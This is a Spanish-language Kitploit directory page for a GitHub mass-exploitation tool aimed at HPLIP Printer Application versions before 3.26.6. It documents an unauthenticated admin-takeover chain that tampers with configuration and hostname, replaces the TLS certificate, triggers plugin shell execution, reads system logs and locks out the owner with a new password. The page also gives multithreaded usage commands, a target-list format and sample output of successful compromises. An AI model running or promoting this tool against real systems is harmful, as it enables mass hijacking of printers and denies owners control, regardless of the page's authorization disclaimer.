Skip to content
KitploitKITPLOIT
HerramientasExploitsBlog
Enviar
HerramientasExploitsBlog
Enviar

¡Herramientas de Hacking, PenTest y Ciberseguridad para tu Arsenal de Seguridad!

Kitploit es un directorio de herramientas de hacking, ciberseguridad y pentesting. Descubre las últimas actualizaciones de proyectos para encontrar vulnerabilidades, analizar sistemas, automatizar pruebas y fortalecer tu seguridad.

··Feeds·Contacto·Privacidad·© 2026 Kitploit

Directorio de Herramientas

Categorías

Ver todas las categorías
Loading categories
CVE-2026-91097-CVE-2026-91106 — HPLIP < 3.26.6 — Toma de control total del administrador a través de la interfaz web de PAPPL (sin autenticación). Relacionado con CVE-2026-91097 hasta CVE-2026-91106 (CVSS 9.3) | Kitploit
Herramientas/GitHubGitHub/nxploited/cve-2026-91097-cve-2026-91106
Herramientas DefensivasEscáneres de VulnerabilidadesExplotaciónExplotación de Aplicaciones WebRecopilación de InformaciónPost-ExplotaciónSeguridad WebSeguridad de Redes
Pruebas de Penetración
Desarrollo de Payloads
GitHubnxploited/cve-2026-91097-cve-2026-91106

CVE-2026-91097-CVE-2026-91106

HPLIP < 3.26.6 — Toma de control total del administrador a través de la interfaz web de PAPPL (sin autenticación). Relacionado con CVE-2026-91097 hasta CVE-2026-91106 (CVSS 9.3)

Ver Repositorio
4hace 1 díaAún no revisado

Más Populares

Ver todos →

Descubre las herramientas más usadas por nuestra comunidad.

Explora todas las herramientas

Explora nuestra colección de herramientas

Ver todas las herramientas →
Compartir

Affected Auth Impact

🔬 Únete a Telegram para las últimas investigaciones de vulnerabilidades y lanzamientos de exploits
Telegram


HPLIP Printer Application — Toma de control administrativa sin autenticación

Herramienta de explotación masiva dirigida a la HPLIP Printer Application (interfaz web basada en PAPPL) en todas las versiones de HPLIP anteriores a 3.26.6. La herramienta explota el estado predeterminado sin autenticación de la interfaz web de PAPPL para realizar una cadena completa de toma de control administrativa: manipulación de la configuración, modificación del nombre de host, reemplazo del certificado TLS, instalación del plugin de HP (desencadena la ejecución mediante shell del archivo .run en el objetivo), exfiltración de registros del sistema y bloqueo de la contraseña de administrador.

Qué explota esta herramienta

La vulnerabilidad principal es el Acceso Administrativo Sin Autenticación de PAPPL — la HPLIP Printer Application se distribuye con ninguna contraseña configurada por defecto, lo que permite a cualquier atacante de red realizar todas las acciones administrativas sin autenticación a través de la interfaz web (normalmente el puerto 8000).

Además, la cadena de instalación de plugins aprovecha debilidades abordadas en:

CVECWECVSS 4.0Relevancia
CVE-2026-91097CWE-94 / CWE-7877.0Path Traversal en plugin.spec — la instalación del plugin desencadenada por esta herramienta pasa por el código vulnerable de pluginhandler.py
CVE-2026-91102CWE-78 / CWE-4948.4Descarga sin verificación de integridad — el archivo .run del plugin se descarga por HTTP y se ejecuta con sh en el objetivo

Boletín de seguridad de HP: HPSBPI04151

Endpoints explotados

EndpointAcciónVerificado
/securityEstablecer contraseña de administrador (toma de control de cuenta)✅
/configModificar nombre DNS-SD, ubicación, organización, contacto✅
/networkCambiar el nombre de host del sistema✅
/tls-install-crtSubir certificado TLS arbitrario + clave privada✅
/pluginDesencadenar descarga del plugin de HP + aceptación de licencia + instalación (ejecuta .run con sh)✅
/logfile.txtLeer el archivo de registro completo de la aplicación (divulgación de información)✅

Cadena de explotación

root@kitploit:~
Target Discovery
    │
    ▼
Detect HPLIP Printer Application (Server header + version)
    │
    ▼
Check Authentication Status (/security)
    │
    ├── Password Set ──► Log as VULN (locked)
    │
    └── No Password (default) ──► Exploit Chain:
            │
            ├── 1. Modify Configuration (/config)
            │       dns_sd_name, location, organization, contact_name
            │       Verified: marker reflected in response
            │
            ├── 2. Change Hostname (/network)
            │       Old hostname captured, new hostname set
            │       Verified: new value reflected in response
            │
            ├── 3. Upload TLS Certificate (/tls-install-crt)
            │       Custom PEM certificate + private key
            │       Multipart file upload
            │
            ├── 4. Install HP Plugin (/plugin)
            │       Step 1: POST action=install-plugin (downloads .run)
            │       Step 2: POST action=license-accepted (executes with sh)
            │       ⚠ CVE-2026-91097 + CVE-2026-91102
            │
            ├── 5. Read Log File (/logfile.txt)
            │       System paths, environment info, Snap paths
            │
            └── 6. Set Admin Password (/security)
                    Locks out further unauthenticated access
                    Completes full admin takeover

Instalación

root@kitploit:~
pip install requests

Se requiere Python 3.8+. Sin otras dependencias.

Uso

Línea de comandos

root@kitploit:~
python T.py targets.txt 50
ArgumentoDescripciónPredeterminado
targets.txtArchivo que contiene la lista de objetivos (uno por línea)Se solicita
50Número de hilos concurrentes15

Modo interactivo

root@kitploit:~
python T.py

La herramienta solicitará el archivo de lista de objetivos y el número de hilos.

Formato de objetivo

root@kitploit:~
192.168.1.100:8000
https://10.0.0.1:8000
http://printer.local:8000
192.168.1.100
printer.example.com
  • Si no se especifica puerto, se usa 8000 por defecto
  • Si no se especifica esquema, se prueban tanto HTTP como HTTPS
  • Los objetivos duplicados se deduplican automáticamente
  • Las líneas que comienzan con # se ignoran

Archivos de salida

ArchivoContenido
AdminS.txtToma de control administrativa — contraseña, versión del servidor, mapa completo de URL del panel
Nx_modify.txtCambios verificados de configuración y nombre de host (valores antiguos → nuevos)
Nx_upload.txtConfirmaciones de subida de certificados TLS
Nx_plugin.txtResultados de la instalación del plugin de HP con estado de ejecución mediante shell
Nx_recon.txtDivulgación de información — tamaño del archivo de registro, rutas de entorno, versión

Ejemplo — AdminS.txt

root@kitploit:~
http://192.168.1.100:8000 | v3.22.10 | password=Nx-zD_buovl6wko0 | server=HPLIP_Printer_Application/3.22.10-13 PAPPL/1.4.9 | panel=http://192.168.1.100:8000/ | security=http://192.168.1.100:8000/security | config=http://192.168.1.100:8000/config | ...

Ejemplo — Nx_modify.txt

root@kitploit:~
http://192.168.1.100:8000/config | v3.22.10 | type=CONFIG | verified=true | dns_sd_name: 'HPLIP Printer Application' -> 'HPLIP [marker]' | location: '' -> 'Nxploited-marker'
http://192.168.1.100:8000/network | v3.22.10 | type=HOSTNAME | verified=true | old=ORIGINAL-HOST.local | new=nx-abc123

Salida de consola

root@kitploit:~
  ━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━

   ██████   ██ ██   ██
   ██  ███  ██  ██ ██
   ██   ██████   ███
   ██    █████  ██ ██
   ██     ████ ██   ██

  ━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━
  HPLIP Printer Application  │  Admin Takeover + Full Control
  Affected < 3.26.6  │  PAPPL Unauthenticated Access

  CVE-2026-91097  │  Plugin Path Traversal
  CVE-2026-91102  │  Plugin Download Without Integrity + Shell Exec

  Exploited via Web:  /security /config /network /plugin /tls-install-crt /logs

  By: Nxploited ( Khaled Alenazi )  │  Telegram: @Kxploit
  ━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━

 targets=4  threads=4

 00:11:34  [CUPS  ]  http://192.168.1.100:8000  Server: HPLIP_Printer_Application/3.22.10-13
 00:11:34  [VER   ]  http://192.168.1.100:8000  v3.22.10 < 3.26.6 AFFECTED
 00:11:35  [PROBE ]  http://192.168.1.100:8000  v3.22.10 | NO AUTH | exploiting...
 00:11:36  [CFG   ]  http://192.168.1.100:8000  CONFIG MODIFIED | marker=abc12345
 00:11:37  [NET   ]  http://192.168.1.100:8000  HOSTNAME 'OLD-HOST.local' -> 'nx-xyz789'
 00:11:38  [CERT  ]  http://192.168.1.100:8000  TLS CERT UPLOADED | marker=abc12345
 00:12:03  [PLG   ]  http://192.168.1.100:8000  PLUGIN | freshly_installed | shell_exec=True
 00:12:05  [LOG   ]  http://192.168.1.100:8000  logfile.txt | 19083B | env=/var/snap/hplip-printer-app/
 00:12:05  [ADMIN ]  http://192.168.1.100:8000  PASSWORD SET | pw=Nx-zD_buovl6wko0
 00:12:05  [HIT   ]  http://192.168.1.100:8000  v3.22.10 + CONFIG + HOSTNAME + CERT + PLUGIN + LOGS + ADMIN

 ━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━
 DONE  4/4  █ HIT=4  █ VULN=0  █ SAFE=0  █ SKIP=0

 ▐ Admin Takeover: 4  └─ AdminS.txt
 ▐ Modifications : 8  └─ Nx_modify.txt
 ▐ Cert Uploads  : 4  └─ Nx_upload.txt
 ▐ Plugin Exec   : 1  └─ Nx_plugin.txt
 ▐ Recon / Info  : 8  └─ Nx_recon.txt
 ━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━

Clasificación de objetivos

EtiquetaSignificado
HITExplotado con éxito — toma de control administrativa lograda
VULNVulnerable pero la contraseña ya está establecida (bloqueado)
SAFEVersión ≥ 3.26.6 (parcheada)
SKIPNo es una HPLIP Printer Application o no es accesible

Notas técnicas

  • La HPLIP Printer Application se ejecuta como un paquete Snap en sistemas basados en Ubuntu, con datos almacenados bajo /var/snap/hplip-printer-app/common/
  • El framework PAPPL utiliza GnuTLS para operaciones TLS (API de C, no comandos de shell) — la subida del certificado TLS escribe en disco pero no desencadena ejecución de código
  • La instalación del plugin desencadena sh plugin.run --keep --nox11, que ejecuta el binario oficial del plugin de HP — el contenido se descarga desde los servidores de HP; el atacante no controla el contenido del plugin pero desencadena su ejecución
  • La herramienta establece una contraseña única por objetivo para evitar la reexplotación y registra las credenciales para verificación
  • Cada cambio de configuración utiliza un marcador aleatorio verificado en la respuesta del servidor para confirmar que la modificación se aplicó
  • Sin RCE arbitrario — la herramienta no sube web shells ni inyecta comandos arbitrarios; las acciones explotables son toma de control administrativa, manipulación de configuración, reemplazo de certificados, ejecución del plugin de HP y divulgación de información

Referencias

  • HP Security Bulletin HPSBPI04151
  • NVD — CVE-2026-91097
  • NVD — CVE-2026-91102
  • HPLIP Release Notes
  • PAPPL Framework

By: Nxploited


⚠️ Descargo de responsabilidad

Esta herramienta se proporciona estrictamente para investigación de seguridad autorizada, pruebas de penetración y fines educativos únicamente. El uso de esta herramienta contra sistemas sin permiso escrito explícito del propietario del sistema es ilegal y poco ético. El autor no asume ninguna responsabilidad por cualquier uso indebido, daño o consecuencia legal derivada del uso de esta herramienta. Obtenga siempre la autorización adecuada antes de realizar cualquier evaluación de seguridad. Al utilizar esta herramienta, usted acepta que es el único responsable de sus acciones y del cumplimiento de todas las leyes y regulaciones aplicables.

Descargar herramienta